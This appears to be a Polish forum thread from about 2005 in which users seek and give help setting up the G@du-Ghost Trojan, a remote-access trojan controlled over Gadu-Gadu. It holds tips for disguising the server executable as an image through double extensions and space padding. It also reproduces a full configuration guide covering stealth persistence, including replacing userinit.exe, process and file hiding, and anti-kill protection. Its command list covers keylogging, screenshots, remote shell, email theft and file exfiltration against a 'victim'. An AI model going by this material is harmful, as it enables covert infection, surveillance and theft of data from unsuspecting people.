Mam problem z GGT 2.0v! Jak ktoś sie na tym zna to PLISEK!!!

NoMiB

Użytkownik
Dołączył
Styczeń 16, 2005
Posty
2
Witam! Jak widać w temacie mam problem z GGT 2.0v!
Sorki, jezeli przeszkadzam, ale niekapuje i nienadzarzam. prosze o pomoc
i z gory THX!! No to do rzeczy:
wlaczam programik. wchodze na zakladke Gadu-Gadu. wpisuje nowy numer zrobiony dla GGT i haslo w USERID i PASSWORD, a pod tym w USERID co jest pod tym dla clienta to mam wpisac jego nr. gg??
teraz tak. wchodze na zakladke e-mail i co tam wogole mam zrobic. pprosze o wytlumasczenie co wpisac w SMTP, LOGIN, PASSWORD, EMAIL CLIENTA. no to w tym e-mail adress na samym dole co pisze client wpisuje chyba jego emila. potem tym AUTHENTICATION login i password to swoj mam podac?? i najwazniejsze co mam wpisac w SERWER SMTP??? o co tam chodzi? i jeszcze co mam zaznaczyc w zakladce MISC? i jak pisze w MISC jest tam file (po prawej na dole) i pisze server. i co mam w tym wpisac?? i obok tego SERVER pisze LOAD ICD czy cos teges. i jeszcze jedno. jak np. chce komus to przeslac to co mam przeslac jak mialem spakowane rozpakowalem i byl tylko plik uruchamiajavy program i jeszcze stronka www.trojanypl.org
I O CO CHODZI bo czytalem ze mam wyslac plik jakis np. pjesek.jpg z drugim rozszerzeniem exe, a niemam tego pliku. PLISEK O INSTRUKCJE:D i z gory THX. jak ktos chce mi pomoc to moze na tym forum albo na gg 9411785. czesto jestem dostepny. szukam wszedzie na forum ale tego nierozumiem i niewiem o co wogole bije
<
plisek
 

NoMiB

Użytkownik
Dołączył
Styczeń 16, 2005
Posty
2
to jeszcze raz ja:D

jeszcze mam 1 pytanko. jak zmienic rozszezenie jak mam server.exe zeby bylo np. .jpg bo dalej czeka %20%20 jak dobrze przyeczytalem i na komcu znowu .exe. to jak ktos odpowie to bede wdzieczny
 

rywin

Użytkownik
Dołączył
Kwiecień 22, 2003
Posty
237
Wszystko z: http://wojass.unitedcrew.net/?ggt=help

-=FAQ=-

- Jak mam kontrolować GGT ?/ Gdzie wpisuje polecenia ?

GGT kontrolujemy za pomocą komunikatora kompatybilnego z siecią Gadu-Gadu. Wygląda to jak zwykła rozmowa na GG. Polecenia i odpowiedzi wpisujemy i odbieramy w okienku rozmowy w komunikatorze.

- Do kogo mam wysłać polecenia ?

Polecenia wysyłamy pod numer, który podaliśmy w konfiguratorze razem z hasłem i ten numer należy wpisać na listę kontaktów.

- Czy potrzebny jest numer i hasło GG ofiary ?

Nie!, jest to w ogóle nie potrzebne.

- Czy ofiara musi mieć zainstalowane Gadu-Gadu ?

Nie!, jest to w ogóle nie potrzebne.

- GGT działa ale na mój komputer, np. wpisując 'hdd' widzę swoje dyski, co jest nie tak ?

Plik server.exe musi uruchomić "ofiara", Ty musisz uruchomić tylko komunikator. Jeżeli GGT działa na Twój
komputer to po prostu sam się zaraziłeś.

- Skąd GGT wie kogo chcę kontrolować ?

Kontrolujesz ten komputer gdzie zainstalowany jest serwer GGT.

- Po co jest plik fsg.exe ?

FSG to po prostu bardzo dobry EXE Packer, służy do zmniejszenia rozmiaru pliku server.exe. FSG jest używany automatycznie podczas generacji serwera, później nie jest już potrzebny. Nie musisz go uruchamiać i wysyłać razem z serwerem.


-=KONFIGURACJA=-
v.2.1

-----------------------
-=Gadu-Gadu=-

UserID - numer GaduGadu
Password - hasło
Ramka G@du-Ghost Trojan:
Tutaj podajemy numer i hasło z którego będzie korzystał nasz trojan. Skąd wziąć ten numer i hasło ?
Odpowiedz jest prosta wystarczy założyć sobie za pomocą komunikatora Gadu-Gadu nowy numer i hasło, po prawidłowej rejestracji w sieci Gadu-Gadu wpisujemy te dane. Ten numer również wpisujemy sobie na listę kontaktów w swoim komunikatorze i pod ten numer będziemy wysyłać polecenia.
Ramka Client:
Klient czyli Ty - właściciel Trojana. Tutaj jako UserID wpisujemy swój prywatny numer GaduGadu.
Z tego numeru będziesz wysyłał polecenia do GGT. Ten numer jest głównie po to żeby GGT wiedział, do kogo ma odpowiadać, kto jest jego właścicielem. Wszystkie wiadomości wysłane przez GGT będą przychodziły właśnie na ten numer.
-----------------------
-=e-mail=-

Sytuacja prawie identyczna jak w „Gadu-Gadu”. Zakładamy nowe konto e-mail (chyba każdy wie, o co chodzi).
Konta pocztowe obsługiwane są przez serwery POP3 i SMTP. Do GGT potrzebny jest tylko serwer SMTP, o adres tego serwera dowiadujemy się tam gdzie zostało założone konto e-mail. ( np. adres serwera SMTP dla kont w domenie @interia.pl to poczta.interia.pl ).
Ramka G@du-Ghost Trojan:
SMTP - podajemy adres SMTP konta z którego będą wysyłane e-maile.
Authentication - Autoryzacja:
Większość (czytaj wszystkie
smile.gif
) darmowych serwerów SMTP wymaga autoryzacji, czyli przed kazdym wysłaniem e-mail`a GGT musi podać login i hasło do konta które mamy założone na tym serwerze.
Loginem może być pełny adres e-mail lub pierwszy człon adresu e-mail przed @.
Ramka Client:
Tutaj podajemy adres e-mail (twój e-mail) na który GGT będzie wysyłał pliki.
----------------------
-=MISC=-

Ramka: Autostart

3 opcje do wyboru, dzięki którym GGT będzie zawsze uruchamiał się podczas startu komputera.
Pierwsze 2 opcje są to wpisy w rejestrze. Pierwsza opcja działa na wszystkich Windowsach, dwie następne tylko XP/2000 itp.
Ostatnia opcja czyli Stealth userinit.exe polega na podmianie pliku systemowego o tej samej nazwie, dzięki temu nasz trojan uruchomi się nawet w trybie awaryjnym !
Gdy żadna opcja nie zostanie zaznaczona, GGT nie uruchomi się ponownie.

Ramka: File

Load ICO

Jeśli chcesz żeby twój serwer GGT miał ikonę możesz ją tu dodać w postaci pliku *.ICO.

Name

Podajemy nazwę pliku, pod jaką będzie się instalował serwer GGT w folderze WindowsSystem32.
Nazwę pliku podajemy bez rozszerzenia *.exe, w przypadku nazwy, np. moje.exe, serwer będzie miał nazwę moje.exe.exe).

Ramka: Stealth

Anti-Kill Process

Opcja umożliwia zabezpieczenie naszego trojana przed zabiciem jego procesu przez takie programy jak np. taskmgr.exe.

Hide Process

Funkcja ta umożliwia ukrycie procesu GGT na systemach XP/2000.

Hide File

Umożliwia ukrycie pliku serwera GGT na kompie ofiary, nie chodzi tu o atrybut ukryty jest to o wiele bardziej zaawansowana metoda.



Polecenia GGT v2.1

G@du-GhostTrojan v2.1
___________________
Opcje: SYSTEM

info -- informacje: System, IP, User.
task -- lista uruchomionych procesów
kill -- zabija proces (np. kill iexplore.exe )
logout -- wyloguje z Windows
reboot -- ponownie uruchomienie komputera
poweroff -- wyłącza komputer
screen -- ScreenShot wysyła na Gadu-Gadu
@screen -- ScreenShot wysyla na e-mail
open -- uruchamia plik EXE, JPG, DOC itd.. oraz adresy http://
(np. open c:plik.exe lub open http://www.ggt.int.pl )
cmd -- uruchamia aplikacje konsolową, wynik odsyła do klienta
(np. cmd ipconfig.exe lub cmd netstat.exe -a )
batch -- wykonuje kod BATCH, po wysłaniu komendy wysyłamy kod
telnet -- klient telnetu ( np: telnet , telnet 127.0.0.1 23 )
telnet off -- konczy polaczenie - telnet
shell -- otwiera dostep do shell`a (np. shell , shell 23 )
shell off -- zamyka shell`a
keylog -- Keylogger (np. keylog on , keylog off , keylog )
chat -- czat z ofiara (np. chat NICK , podajemy NICK do 12 znaków)
end -- zamyka połaczenie GGT
outlook -- lista dostępnych folderów w OutlookExpress
outfolder -- lista e-mail`i w danym folderze (np. outlook 2)*
outfile -- wysyła wybrany e-mail do klienta (np. outfile 54321 )*
* -- wymaga outlook
___________________
Opcje: PLIKI

hdd -- lista dysków
dir -- zawartość dysku/folderu (np. dir c: lub dir d:foldernowy )
del -- kasuje plik (np. del d:folderplik.exe )
deltree -- kasuje foldery (np deltree c:nowy folder )
mail -- wysyła plik na e-mail klienta (np. mail d:folderplik.txt )
___________________
Opcje: FTP

ftp -- otwiera Serwer FTP na dowolnym porcie (np. ftp on , ftp off ) login/hasło
dowolne
cftp -- Klient FTP, łączy z zewnętrznym serwerem FTP
coff -- zamyka połączenie Klienta FTP
upload -- ładuje pliki na serwer FTP (np. upload d:plik.rar )**
download -- zmienia bierzący folder lub ściąga pliki z serwera FTP
i zapisuje w folderze Windows (np. download .. lub download 2 )**
stopftp -- przerywa transfer cftp
delftp -- kasuje pliki na serwerze FTP (np. del 1 )**
** -- wymaga cftp
 

Zox

Użytkownik
Dołączył
Czerwiec 23, 2004
Posty
1
A ja jednak mam pytanie i potrzebowałbym szybkiej łopatologicznej pomocy. Konkretnie chodzi o część koment z działu FTP. Jak się połączyc z serwerem? (krok po kroku).
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Originally posted by Zox
A ja jednak mam pytanie i potrzebowałbym szybkiej łopatologicznej pomocy. Konkretnie chodzi o część koment z działu FTP. Jak się połączyc z serwerem? (krok po kroku).

Jezu masz na forum uc wystarczy tylko troche poszukac .A help nie dziala?
 
Do góry Bottom